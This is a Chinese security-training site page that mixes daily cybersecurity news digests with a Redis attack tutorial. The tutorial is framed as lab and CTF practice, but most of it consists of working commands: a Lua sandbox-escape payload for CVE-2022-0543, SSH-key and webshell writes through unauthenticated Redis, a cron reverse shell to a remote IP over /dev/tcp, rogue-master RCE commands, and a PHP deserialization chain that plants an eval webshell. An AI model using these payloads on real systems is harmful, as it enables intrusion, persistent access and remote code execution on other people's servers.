https://www.cysecurity.news/2024/01/a-crucial-update-from-epfo-regarding.html 负责管理员工工资扣除的员工公积金组织 (EPFO) 已向其 6.5 亿成员发出关于网络犯罪威胁不断升级的警告。EPFO 发现与公积金 (PF) 账户相关的欺诈活动显着增加。诈骗者通过电话和短信冒充 EPFO 官员,欺骗个人泄露敏感的个人信息,使他们容易遭受各种形式的欺诈。为了应对这种日益严重的担忧,EPFO 敦促其成员保持高度警惕。EPFO 在监督雇员退休基金方面发挥着关键作用,雇主和雇员均向该基金缴款。雇员的 EPF 账户下的基本工资被
4、施乐公司遭INC RANSOM勒索软件攻击
https://securityaffairs.com/156679/cyber-crime/inc-ransom-ransomware-xerox-corp.html INC RANSOM 勒索软件组织声称对美国跨国公司施乐公司进行了黑客攻击。施乐公司在全球范围内提供文档管理解决方案。该公司的文档技术部门提供桌面单色和彩色打印机、多功能打印机、复印机、数字印刷机和轻型生产设备;以及用于图形通信市场和大型企业的生产印刷和出版系统。INC RANSOM 勒索软件组织声称对攻击美国跨国公司施乐公司负责,并威胁要披露涉嫌被盗的数据。INC 勒索组织将 Xerox 添加到其 Tor 泄露网站的受害者
5、TuneFab因错误配置而暴露其用户私人数据
https://securityaffairs.com/156659/security/spotify-music-converter-tunefab-data-leak.html TuneFab 转换器用于转换来自 Spotify、亚马逊 Audible 或 Apple Music 等流媒体平台的受版权保护的音乐,该转换器已暴露其用户的私人数据。该平台已暴露超过 1.51 亿条解析记录,其中包括用户的 IP 地址、用户区域、用户 ID、电子邮件和设备信息。此次泄露是由于 MongoDB(一个面向文档的数据库平台)的错误配置造成的,导致 TuneFab 的数据无密码且可公开访问。私人数据泄露
6、Black Basta 勒索软件免费解密器发布
https://www.securityweek.com/free-decryptor-released-for-black-basta-ransomware/ Black Basta 勒索软件加密算法中的漏洞允许研究人员创建免费解密器。
7、谷歌“隐身模式”追踪用户隐私诉讼达成和解赔偿50 亿美元
https://www.securityweek.com/google-settles-5-billion-privacy-lawsuit-over-tracking-people-using-incognito-mode/ 谷歌同意就一项价值 50 亿美元的隐私诉讼达成和解,该诉讼声称该公司继续监视在 Chrome 浏览器中使用“隐身”模式的用户。
8、伊朗多个组织遭到神秘黑客攻击
https://securityaffairs.com/156761/hacking/multiple-organizations-iran-hacked.html Hudson 研究人员报告称,12 月 20 日,一名名为“irleaks”的黑客宣布出售据称从伊朗 23 家领先保险公司窃取的超过 1.6 亿条记录。黑客声称,被盗数据包括名字、姓氏、出生日期、父亲姓名、电话号码、手机号码、国家代码、公司国家代码等。黑客还分享了数据样本,售价 60,000 美元。12 月 30 日,irleaks 还声称入侵了伊朗最大的外卖平台 SnapFood,窃取了 3 TB 数据。
9、Zeppelin2 勒索软件生成器在暗网上出售
https://thecyberexpress.com/zeppelin2-ransomware/ 地下论坛上的一名用户正在推销 Zeppelin2 勒索软件,提供其源代码和其构建工具的破解版本。Zeppelin2 自 2019 年以来一直使用,针对包括医疗保健和技术在内的各个领域。
10、谷歌OAuth验证系统曝零日漏洞,可被黑客用于账户劫持
https://www.freebuf.com/news/388434.html 近日,有多个窃取信息的恶意软件家族正在滥用一个未记录的名为 "MultiLogin "的谷歌 OAuth 端点恢复过期的身份验证 cookie 。通过这种方式黑客可以获取到用户账户信息,即使账户密码已被重置仍能成功登陆。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
数据库攻防学习之Redis
Redis
0x01 redis学习
在渗透测试面试或者网络安全面试中可能会常问redis未授权等一些知识,那么什么是redis?redis就是个数据库,常见端口为6379,常见漏洞为未授权访问。
0x02 环境搭建
这里可以自己搭建一个redis环境,也可以用vulfocus搭建一个环境,可以两个都搭建,因为一些攻击手法,需要自己搭建的环境才能成功。
ubuntu 20.04+docker
docker create -p 8088:80 -v /var/run/docker.sock:/var/run/docker.sock -e
VUL_IP=127.0.0.1 vulfocus/vulfocus
建议vulfocus最好搭建在云服务器上,本机搭建的有的环境可能会复现不成功。
0x03漏洞复现
Redis Lua沙盒绕过 命令执行 CVE-2022-0543
该漏洞的存在是因为Debian/Ubuntu中的Lua库是作为动态库提供的。自动填充了一个package变量,该变量又允许访问任意Lua功能。我们借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。在Lua中执行这个导出函数,即可获得io库,再使用其执行命令
该漏洞的存在是因为Debian/Ubuntu中的Lua库是作为动态库提供的。自动填充了一个package变量,该变量又允许访问任意Lua 功能
我们借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。在Lua中执行这个导出函数,即可获得io库,再使用其执行命令
代码如下
local io_l =
package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0",
"luaopen_io");
local io = io_l();
local f = io.popen("id", "r");
local res = f:read("*a");
f:close();
return res
payload如下
eval 'local io_l =
package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0",
"luaopen_io"); local io = io_l(); local f = io.popen("id", "r");
local res = f:read("*a"); f:close(); return res' 0
漏洞复现
eval 'local io_l =
package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0",
"luaopen_io"); local io = io_l(); local f = io.popen("ls", "r");
local res = f:read("*a"); f:close(); return res' 0
这里可以用another redis 这个个管理工具,方便redis数据库使用
eval 'local io_l =
package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0",
"luaopen_io"); local io = io_l(); local f = io.popen("find / -name
flag*", "r"); local res = f:read("*a"); f:close(); return res' 0
未授权访问redis 未授权访问 (CNVD-2015-07557)
这个未授权访问存在很多,而且面试也很常问,实战也能遇见到。
攻击姿势常见有三种,1写入公钥,2写入webshell,3写入计划任务,当然其中有不少细节,我们需要去掌握。
1.linux写入公钥
利用前提 Redis服务使用ROOT账号启动,安全模式protected-mode处于关闭状态
允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器
ssh-keygen -t rsa
cd /root/.ssh/
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n")> key.txt
cat key.txt | redis-cli -h 目标IP -x set xxx
这里权限不够,这个是vulfocus有问题
满足条件的话可以直接这样,可以自己搭建一个redis环境做实验
具体搭建可参考
https://blog.csdn.net/qq_41210745/article/details/103305262yes要改成no
环境启动,接着
config set dir /root/.ssh/
config set dbfilename authorized_keys
save
cd /root/.ssh/
ssh -i id_rsa root@目标IP
已经成功写入
进入该ubuntu查看 cd /root/.ssh/
尝试SSH连接
ssh -i id_rsa root@192.168.48.133
可以看到成功拿下
2.写入webshell
前提条件,有可写权限,存在web服务,知道web路径
继续用该环境下尝试webshell写入
命令如下
FLUSHALL 使用这个清空之前的配置
前提条件,web目录可以读写
config set dir /tmp 设置WEB写入目录
config set dbfilename test.php 设置写入文件名
set test "<?php phpinfo();?>" 设置写入文件代码
set xxx "\r\n\r\n<?php phpinfo();?>\r\n\r\n"
换行防止执行失败
bgsave 保存执行
save
chmod -R 777 /var/www/html/
这里设置html尝试写入webshell
3.写计划任务反弹shell
FLUSHALL 记得清空配置
利用条件:Redis服务使用ROOT账号启动,安全模式protected-mode处于关闭状态
环境依然是上面的配置环境
config set dir /var/spool/cron
set yy "\n\n\n* * * * * bash -i >& /dev/tcp/ip/端口
0>&1\n\n\n"
config set dbfilename x
save
set yy "nnn* * * * * bash -i >&
/dev/tcp/192.168.48.133/9999 0>&1\n\n\n"
注意:
centos会忽略乱码去执行格式正确的任务计划
而ubuntu并不会忽略这些乱码,所以导致命令执行失败
可以看到有乱码,ubuntu并未正常执行
主从复制利用
https://github.com/n0b0dyCN/redis-rogue-server 得到的是一个交互式的shell
https://github.com/vulhub/redis-rogue-getshell 这个可以直接命令执行
redis-rogue-serve
python redis-rogue-server.py --rhost 目标IP --rport 目标端口 --lhost
IP
python3.6 redis-rogue-server.py --rhost 192.168.48.133 --rport 29325
--lhost 192.168.48.132
https://github.com/vulhub/redis-rogue-getshell这里记得要编译
cd RedisModulesSDK/
make
python3.6 redis-master.py -r 192.168.48.133 -p 56024 -L 192.168.48.132
-P 6666 -f RedisModulesSDK/exp.so -c "id"
python3.6 redis-master.py -r 192.168.48.133 -p 56024 -L 192.168.48.132
-P 6666 -f RedisModulesSDK/exp.so -c "find / -name flag*"
实际情况中我们可以灵活运用exp.so文件,不一定非得用脚本,比如这种情况
天翼杯
考点反序列化,redis主从复制RCE代码
<?php
class a{
public $code = "";
function __call($method,$args){
eval($this->code);
}
// function __wakeup(){
// $this->code = "";
// }
}
class b{
function __destruct(){
echo $this->a->a();
}
}
$a=new A();
$b=new B();
$a->code="phpinfo();";
$b->a=$a;
echo
serialize($b);
构造POP链子,可以看到call魔术方法里面有eval函数,那么需要构造链子触发到call魔术方法。
call():当调用对象中不存在的方法会自动调用该方法wakeup()当使用unserialize()反序列化一个对象后,会自动调用该对象的__wakeup方法
这里destruct方法调用了一个不存在的a方法,那么会调用到call方法
因为wakeup方法中$this->code ="";还有preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);这里有过滤,所以接下来要做到绕过wakeup和正则,这里利用wakeup的CVE和php对类名大小写不敏感的特性去绕过,A,B换成a,b,其中wakeup漏洞原理:在类对象属性个数超过实际个数时就会不执行wakeup函数。
如下O:1:"b":1:{s:1:"a";O:1:"a":1:{s:4:"code";s:10:"phpinfo();";}}绕过wakeupO:1:"b":2:{s:1:"a";O:1:"a":1:{s:4:"code";s:10:"phpinfo();";}}
这里无法执行system("ls")
蚁剑连接$a->code="eval($_POST["a"]);";
打开之后发现其泄露了redis的密码define("REDIS_PASS","you_cannot_guess_it");蚁剑插件连接上
使用EXP.so文件
MODULE LOAD /var/www/html/exp.so
然后就可以进行命令执行了
若有收获,就点个赞吧。
网络安全日报 2024年01月02日
1、微软禁用恶意软件攻击中滥用的MSIX协议处理程序
https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/ 在多个出于经济动机的威胁团体滥用 MSIX ms-appinstaller 协议处理程序以恶意软件感染 Windows 用户后,微软再次禁用了 MSIX ms-appinstaller 协议处理程序。攻击者利用CVE-2021-43890 Windows AppX Installer 欺骗漏洞来规避安全措施,这些措施可以保护 Windows 用户免受恶意软件的侵
2、松下航空电子公司披露2022年12月网络攻击后数据泄露事件
https://www.documentcloud.org/documents/24238563-panasonic-avionics-corporation-consumer-notice-letter 飞行通信和娱乐系统的领先供应商松下航空电子公司在一年多前(即 2022 年 12 月)公司网络遭到破坏后,披露了一次数据泄露事件,影响人数不详。攻击者破坏了其公司网络上的部分设备,并获得了从受影响的个人及其雇主收集的信息的访问权限。尽管一些个人和健康信息在事件中被曝光,但松下尚未找到证据表明自袭击以来这些信息被滥用。泄露期间受影响的信息包括受影响个人的姓名、联系方式(电子邮件地址、邮寄地址
3、攻击者冒充招聘人员窃取区块链开发人员的加密货币
https://twitter.com/muratctp/status/1739224777955369420 一位区块链开发人员分享了他在假期期间的事件,当时一位“招聘人员”在 LinkedIn 上向他寻求一份网络开发工作。相关招聘人员要求开发人员从 GitHub 存储库下载 npm 包,几个小时后,开发人员发现他的 MetaMask 钱包已被清空。安塔利亚的区块链和网络开发人员Murat Çeliktepe本周分享了 LinkedIn 上一位“招聘人员”如何通过看似合法的 Upwork 招聘信息找到他。作为面试的一部分,招聘人员要求 Çeliktepe 下载并调试托管在 GitHub 存
4、Kroll发布2023年8月份数据泄露中影响的FTX客户信息
https://www.mass.gov/doc/assigned-data-breach-number-31103-kroll-restructuring-administration-llc-12-8-23/download 风险和财务咨询公司 Kroll 发布了有关 8 月份数据泄露的更多详细信息,该事件暴露了 FTX 破产申请人的个人信息。暴露的数据包括代币持有量和余额,这将使威胁行为者能够确定在加密货币市场进行大量投资的有吸引力的目标。该公司发布的信中提示到,这封信提供了重要信息,可以帮助保护您和您的数字资产免遭滥用您的个人数据,包括您的姓名、电子邮件地址、电话号码、地址、索赔编号
5、停车应用开发商EasyPark披露数据泄露可能影响数百万用户
https://www.easypark.com/en-de/comm 停车应用开发商 EasyPark 在其网站上发布了一份通知,警告其于 2023 年 12 月 10 日发现的数据泄露事件,该事件影响了其数百万用户中数量未知的情况。EasyPark 是一家瑞典公司,开发移动和网络应用程序,用作停车位定位器、预订管理器和电动汽车充电点查找器。该公司在20个国家和4000多个城市运营数字停车服务,覆盖欧洲大部分地区、美国、澳大利亚、新西兰和英国。ParkMobile 披露了 2021 年发生的大规模数据泄露事件 ,导致 2100 万客户的数据被盗。该数据库随后在黑客论坛上免费发布。
6、APT28组织使用新型恶意软件针对乌克兰发起网络攻击
https://cert.gov.ua/article/6276894 乌克兰计算机紧急响应小组 (CERT-UA) 警告称,与俄罗斯有关的 APT28 组织精心策划了一场新的网络钓鱼活动,该活动部署了 OCEANMAP、MASEPIE 和 STEELHOOK 等以前未记录的恶意软件,以获取敏感信息。该机构于 2023 年 12 月 15 日至 25 日期间发现了这一活动,该活动针对乌克兰政府实体和波兰组织,通过电子邮件敦促收件人点击链接查看文档。
7、信息窃取器利用新型Google OAuth2漏洞进行会话劫持
https://www.cloudsek.com/blog/compromising-google-accounts-malwares-exploiting-undocumented-oauth2-functionality-for-session-hijacking 研究人员警告说,多个恶意软件即服务信息窃取程序现在能够操纵身份验证令牌,使用户能够持续访问受害者的 Google 帐户,即使在用户重置密码后也是如此。2023 年 10 月,开发人员发现了一个关键漏洞,该漏洞允许通过令牌操作生成持久性 Google cookie。即使在用户重置密码后,此漏洞也可以持续访问 Google 服务。
8、阿尔巴尼亚的议会和电信公司遭受网络攻击
https://cesk.gov.al/deklarate-zyrtare-3/ 阿尔巴尼亚国家电子认证和网络安全局 (AKCESK) 本周透露,阿尔巴尼亚共和国议会和电信公司 One Albania 已成为网络攻击的目标。AKCESK表示:“根据现行立法,这些基础设施目前并未被归类为关键或重要的信息基础设施。”拥有近150万用户的 One Albania 在12月25日的 Facebook 帖子中表示,该公司已经处理了此次安全事件,没有出现任何问题,其包括移动、固定电话和 IPTV 在内的服务并未受到影响。AKCESK 进一步指出,入侵并非源自阿尔巴尼亚 IP 地址,并补充说它设法“实时识
9、新型Black Basta解密器使用勒索软件漏洞以恢复文件
https://github.com/srlabs/black-basta-buster 研究人员创建了一种解密器,该解密器利用 Black Basta 勒索软件中的漏洞,使受害者可以免费恢复其文件。该解密器允许 Black Basta 受害者从 2022 年 11 月到本月免费恢复他们的文件。然而Black Basta 开发人员大约一周前修复了其加密例程中的错误,从而防止了这种解密技术被用于新的攻击。“Black Basta Buster”解密器来自安全研究实验室发现勒索软件团伙的加密器使用的加密算法存在一个弱点,该弱点允许发现用于异或加密文件的 ChaCha 密钥流。
10、攻击者在暗网中发起Leaksmas活动泄露大量PII和受损数据
https://www.resecurity.com/blog/article/cybercriminals-launched-leaksmas-event-in-the-dark-web-exposing-massive-volumes-of-leaked-pii-and-compromised-data 平安夜,研究人员观察到暗网上有多个行为者泄露了大量数据。超过 5000 万条包含世界各地消费者 PII 的记录已被泄露。此活动造成的实际损失可能高达数百万美元。由于个人数据和数字身份之间错综复杂的互连,减轻这种损害尤其具有挑战性。对于普通消费者来说,在实践中更改这些信息是一个复杂且通常困
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2023年12月29日
1、iPhone三角测量攻击滥用了未记录的硬件功能
https://securelist.com/operation-triangulation-the-last-hardware-mystery/111669/ 自 2019 年以来,针对 iPhone 设备的三角测量行动间谍软件攻击利用了 Apple 芯片中未记录的功能来绕过基于硬件的安全保护。研究人员在过去一年中一直在对复杂的攻击链进行逆向工程,试图挖掘出支持他们最初于 2023 年 6 月发现的攻击活动的所有细节。发现和使用可能用于调试和工厂测试的不起眼的硬件功能来对 iPhone 用户发起间谍软件攻击表明,这是一个经验丰富的威胁行为者实施了该活动。三角测量行动是一种针对 Apple
2、DragonForce勒索软件针对俄亥俄州彩票发起网络攻击
https://ohiolottery.com/security 圣诞节前夕,一次网络攻击影响了数量不详的内部申请,俄亥俄州彩票被迫关闭了一些关键系统。虽然该事件目前正在调查中,并且彩票正在努力恢复所有受影响的服务,但其游戏系统仍然全面运行。该彩票在周三发布的新闻稿中表示:“超级零售商目前不提供移动兑现和 599 美元以上奖金兑现服务。”根据另一份公告,在事件调查和系统恢复上线期间,客户还可以查看俄亥俄州彩票网站和移动应用程序中的中奖号码。他们还可以在任何俄亥俄州彩票零售商网点兑现高达 599 美元的奖金,但超过 600 美元的奖金必须邮寄到俄亥俄州彩票中心办公室或使用数字索赔表领取。
3、Lockbit勒索软件针对德国医院发起攻击影响其紧急护理
https://www.kho.de/kho/index.php 德国医院网络 Katholische Hospitalvereinigung Ostwestfalen (KHO) 已证实,最近三家医院的服务中断是由 Lockbit 勒索软件攻击造成的。这次袭击发生在 2023 年 12 月 24 日星期六凌晨。它严重影响了支持德国比勒费尔德、雷达-维登布吕克和黑尔福德三家医院运营的系统。该医院发布的公告称身份不明的攻击者已经访问了医院 IT 基础设施的系统,并加密了数据。初步测试表明,这可能是 Lockbit 3.0 的网络攻击,目前解决时间无法预见。出于安全原因,所有系统一经发现立即关闭
4、抵押贷款公司LoanCare警告130万借款人称其数据泄露
https://capedge.com/filing/1331875/0001331875-23-000064/FNF-8K 抵押贷款服务公司 LoanCare 警告全美 1316938 名借款人,他们的敏感信息在其母公司 Fidelity National Financial 的数据泄露中遭到泄露。LoanCare 是一家次级服务和临时次级服务提供商,也是抵押贷款服务领域的重要参与者,处理着 120 万笔贷款中约 3900 亿美元的余额。上周,其母公司富达国家金融公司(美国著名的产权保险提供商)在美国 证券交易委员会的一份文件中披露了一次网络攻击。披露后,LoanCare 在其网站上发布了
5、澳大利亚最大的医疗保健提供商遭到网络攻击
https://www.freebuf.com/news/387994.html 近日,澳大利亚最大的医疗保健提供商——圣文森特健康澳大利亚在遭受网络攻击后导致数据泄露。
6、腾讯发布AI安全助手,助力企业智能化安全运营
http://www.anquan419.com/knews/24/6481.html 会上腾讯云安全发布“全域安全”解决方案,通过打造CNAPP+SIEM的安全一体化平台,结合首次对外发布的AI安全助手的应用,助力企业实现智能的统一安全运营。
7、 江海证券因网络安全问题被要求整改
http://www.anquan419.com/knews/24/6482.html 近日,黑龙江证监局发布公告表示,江海证券存在关于IT治理、网络安全管理的内部决策、执行机制不健全;公司App个人信息保护合规性检测不充分,App强制、频繁、过度索取权限等问题。
8、Google云解决了影响 Kubernetes 服务的权限升级漏洞
https://thehackernews.com/2023/12/google-cloud-resolves-privilege.html Google Cloud 已经解决了其平台中的一个中度安全漏洞,该漏洞可能被已经有权访问 Kubernetes 集群的攻击者滥用以升级其权限。
9、阿尔巴尼亚议会和电信公司遭受网络攻击
https://therecord.media/albanian-parliament-telecom-company-hit-by-cyberattacks 阿尔巴尼亚议会和一家电信公司成为来自阿尔巴尼亚境外的网络攻击的目标。这些攻击试图干扰基础设施并删除数据,但尚未将其归因于特定的威胁行为者。
10、攻击者通过 Play 商店分发Xamalicious Android 恶意软件
https://securityaffairs.com/156514/malware/xamalicious-android-backdoor.html 研究人员发现了一种名为 Xamalicious 的新 Android 恶意软件,它可以完全控制设备并执行欺诈操作。Xamalicious依靠社会工程来获得可访问权限,然后它连接到C2来评估是否下载第二阶段的有效负载。恶意有效负载在运行时作为程序集 DLL 动态注入,以完全控制设备并执行广泛的欺诈操作,例如点击广告和安装应用程序。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页
蚁景网安学院火热招生中,限时领取大额优惠券,快来抢购吧~
扫码咨询客服了解招生最新内容和活动

